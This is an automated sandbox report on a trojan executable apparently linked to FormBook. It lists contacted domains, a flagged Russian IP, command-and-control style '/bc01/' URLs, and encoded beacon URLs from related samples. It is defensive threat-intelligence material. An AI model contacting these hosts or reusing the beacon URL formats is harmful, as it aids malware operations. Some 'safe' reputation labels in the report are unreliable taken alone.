          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.oko.events
          		185.26.122.70
          		truetrue
            		unknown
            www.2ar1.shop
            		unknown
            		unknowntrue
              		unknown
              www.refabricated-homes-74404.bond
              		unknown
              		unknowntrue
                		unknown
                www.aming-chair-83359.bond
                		unknown
                		unknowntrue
                  		unknown
                  www.nline-degree-6987776.world
                  		unknown
                  		unknowntrue
                    		unknown
                    www.obs-for-seniors-39582.bond
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      www.avada-casino-tlj.buzz/bc01/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://powerpoint.office.comerexplorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.oko.eventsReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.aming-chair-83359.bond/bc01/www.refabricated-homes-74404.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://android.notify.windows.com/iOSA4explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://www.obs-for-seniors-39582.bond/bc01/www.oko.eventsexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/DataSet1.xsdTEKL#U0130F #U0130ST.exefalse
                                  		high
                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.eals.latReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://excel.office.comexplorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.ewferg.top/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.ajabandot.websiteexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.oko.events/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.obs-for-seniors-39582.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.52cy67sk.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.irmag.onlineexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.52cy67sk.bondReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.eals.lat/bc01/www.ajabandot.websiteexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.oko.events/bc01/www.aming-chair-83359.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.olocaustaffirmer.netReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.y-language-menu.netReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.microsoft.cexplorer.exe, 00000006.00000000.1569063480.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.2ar1.shopexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTEKL#U0130F #U0130ST.exe, 00000000.00000002.1552438954.000000000338B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://android.notify.windows.com/iOSdexplorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.lkjuy.xyzReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.ewferg.top/bc01/www.52cy67sk.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.lkjuy.xyzexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.y-language-menu.net/bc01/www.avada-casino-tlj.buzzexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.olocaustaffirmer.netexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ewferg.topReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.refabricated-homes-74404.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://outlook.comexplorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.irmag.onlineReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nline-degree-6987776.world/bc01/www.ntercash24-cad.homesexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.2ar1.shop/bc01/www.obs-for-seniors-39582.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nline-degree-6987776.worldexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ntercash24-cad.homes/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.eals.latexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.lkjuy.xyz/bc01/www.ewferg.topexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.refabricated-homes-74404.bondReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.irmag.online/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.aming-chair-83359.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.avada-casino-tlj.buzz/bc01/www.olocaustaffirmer.netexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.ajabandot.websiteReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.avada-casino-tlj.buzz/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.lkjuy.xyz/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.refabricated-homes-74404.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://java.Bexplorer.exe, 00000006.00000002.2823132896.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2286118045.000000000C12C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1584952319.000000000C12D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.microexplorer.exe, 00000006.00000002.2814156946.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2807627861.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1565613332.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.aming-chair-83359.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.ntercash24-cad.homes/bc01/www.irmag.onlineexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://wns.windows.com/EM0explorer.exe, 00000006.00000000.1583309348.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.ntercash24-cad.homesexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.irmag.online/bc01/www.eals.latexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.oko.eventsexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.obs-for-seniors-39582.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.2ar1.shop/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.nline-degree-6987776.world/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.olocaustaffirmer.net/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.y-language-menu.net/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.nline-degree-6987776.worldReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.ntercash24-cad.homesReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.52cy67sk.bond/bc01/MMflexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.olocaustaffirmer.net/bc01/www.lkjuy.xyzexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.ewferg.topexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      http://www.refabricated-homes-74404.bond/bc01/www.nline-degree-6987776.worldexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://ns.adobeSexplorer.exe, 00000006.00000000.1561108921.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2808794232.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.avada-casino-tlj.buzzReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.52cy67sk.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.ajabandot.website/bc01/www.y-language-menu.netexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            185.26.122.70
                                                                                                            		www.oko.eventsRussian Federation
                                                                                                            		62082HOSTLANDRUtrue

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1549204
                                                                                                            Start date and time:2024-11-05 12:27:17 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 27s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:14
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:1
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:TEKL#U0130F #U0130ST.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:TEKLF ST.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.evad.winEXE@12/6@6/1
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 97
                                                                                                            • Number of non-executed functions: 337
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • VT rate limit hit for: TEKL#U0130F #U0130ST.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            06:28:28API Interceptor1x Sleep call for process: TEKL#U0130F #U0130ST.exe modified
                                                                                                            06:28:29API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                            06:28:37API Interceptor1955963x Sleep call for process: explorer.exe modified
                                                                                                            06:29:13API Interceptor2120846x Sleep call for process: mstsc.exe modified

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            185.26.122.70hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.oko.events/c24t/?Edg8Tp=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbO0lNj685To&iL30=-ZRd9JBXfLe8q2J
                                                                                                            docs.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.oko.events/c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F
                                                                                                            Dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
